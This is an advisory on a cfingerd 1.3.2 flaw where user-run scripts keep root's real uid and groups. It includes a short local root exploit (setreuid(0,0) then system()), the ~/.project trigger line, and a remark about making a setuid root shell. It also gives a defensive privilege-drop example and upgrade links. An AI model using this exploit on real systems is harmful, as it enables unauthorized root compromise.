COMMAND
cfinger
SYSTEMS AFFECTED
Systems running cfingerd 1.3.2
PROBLEM
John Goerzen found out that cfingerd 1.3.2 contains a security
hole that could lead to easy root compromise for any user that has
an account on the local machine, but only if ALLOW_EXECUTION is
set in /etc/cfingerd/cfingerd.conf. By default, this option is
DISABLED in Debian GNU/Linux.
The ALLOW_EXECUTION option permits any user on the system to
execute a program when their username is fingered. cfingerd needs
to run as root but doesn't properly throw away root permissions
when it starts up the user's script. When it is told to invoke
/usr/bin/id from a user's script, it produces:
uid=0(root) gid=0(root) euid=65534(nobody) groups=0(root)
As for exploit, have it exec this:
#include <stdlib.h>
#include <unistd.h>

int main(void) {
    setreuid(0,0);          /* real and saved uid are still 0, so this succeeds */
    system("/usr/bin/id");  /* now runs with full root privileges */
    return 0;
}
Of course, system can exec any more devious command you choose,
e.g. marking a shell setuid root, etc. (This can also be done with
C calls.) To test the exploit, put something like this in
~/.project:
$exec /home/jgoerzen/test
and enable ALLOW_EXECUTION. This gives root for everything the
script runs. Additionally, as the output shows, cfingerd fails to
relinquish group permissions at all. After applying the fix below,
the new output is:
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
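The root cause above is that only the effective uid is changed while the real and saved uid stay 0 and the gid and supplementary groups are never touched, so a child can simply call setreuid(0,0). As an added example, not part of this advisory or of the cfingerd source, the following C program shows the broken drop beside the correct sequence (supplementary groups, then gid, then uid) and a check that the drop is irreversible, using the same nobody/nogroup ids (65534) as the fixed output. The function names and the assumption of a Linux/BSD libc are mine:

```c
/* Added example: a correct privilege drop and a check that it really is
 * irreversible. Not cfingerd's code. Assumes Linux or BSD libc.
 * Build: cc -Wall -o dropdemo dropdemo.c */
#include <errno.h>
#include <grp.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/* The shape of the bug above: only the effective uid is changed, so the
 * real and saved uid remain 0 and setreuid(0,0) gets root back. The gid
 * and the supplementary group list are never changed at all. */
int broken_drop(uid_t uid)
{
    return seteuid(uid);
}

/* Correct order: groups first, then gid, then uid. Each step needs the
 * privilege that a later step throws away, so the order matters. As root,
 * setuid() sets real, effective and saved uid together, which is what
 * makes the drop permanent. */
int drop_privileges(uid_t uid, gid_t gid)
{
    /* Only a privileged process may change the supplementary list; an
     * already-unprivileged caller has nothing inherited from root. */
    if (geteuid() == 0 && setgroups(1, &gid) == -1)
        return -1;
    if (setgid(gid) == -1)
        return -1;
    if (setuid(uid) == -1)
        return -1;
    return 0;
}

/* Returns 1 if the process holds exactly uid/gid and the call the exploit
 * above relies on, setreuid(0,0), is refused; 0 otherwise. */
int privileges_fully_dropped(uid_t uid, gid_t gid)
{
    if (getuid() != uid || geteuid() != uid)
        return 0;
    if (getgid() != gid || getegid() != gid)
        return 0;
    if (uid != 0) {
        /* setreuid(0,0) can only succeed while 0 is still the real,
         * effective or saved uid; after a correct drop it must fail
         * with EPERM. */
        errno = 0;
        if (setreuid(0, 0) != -1 || errno != EPERM)
            return 0;
    }
    return 1;
}

/* Drops to nobody/nogroup (65534, as in the fixed output above) when run
 * as root, or to the caller's own ids otherwise, and reports the result. */
int demo_drop(void)
{
    uid_t uid = getuid();
    gid_t gid = getgid();
    if (uid == 0) {
        uid = 65534;
        gid = 65534;
    }
    if (drop_privileges(uid, gid) == -1) {
        perror("drop_privileges");
        return 0;
    }
    return privileges_fully_dropped(uid, gid);
}

int main(void)
{
    int ok = demo_drop();
    printf("uid=%u gid=%u fully dropped: %s\n",
           (unsigned)getuid(), (unsigned)getgid(), ok ? "yes" : "NO");
    return ok ? 0 : 1;
}
```

Run it as root and it prints uid=65534 gid=65534 and reports the drop as complete; swap drop_privileges() for broken_drop() and the setreuid(0,0) check succeeds, which is exactly the condition the id output above revealed.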
SOLUTION
Debian GNU/Linux comes with cfingerd, but in its default
configuration, it is safe. For maximum security, please install
the upgraded packages anyway. cfingerd greater than or equal to
1.3.2-11.0 will have the fix. Go to:
http://happy.cs.twsu.edu/~jgoerzen/cfingerd/
John Goerzen did a dirty hack of cfingerd to run non-root quite
some time ago. You lose a little functionality, but maybe nothing
important:
http://users.dandy.net/~fbn/cfingerd-1.3.2.lsm
http://users.dandy.net/~fbn/cfingerd-1.3.2.tar.gz
http://users.dandy.net/~fbn/cfingerd-1.3.2.noroot.lsm
http://users.dandy.net/~fbn/cfingerd-1.3.2.noroot.tar.gz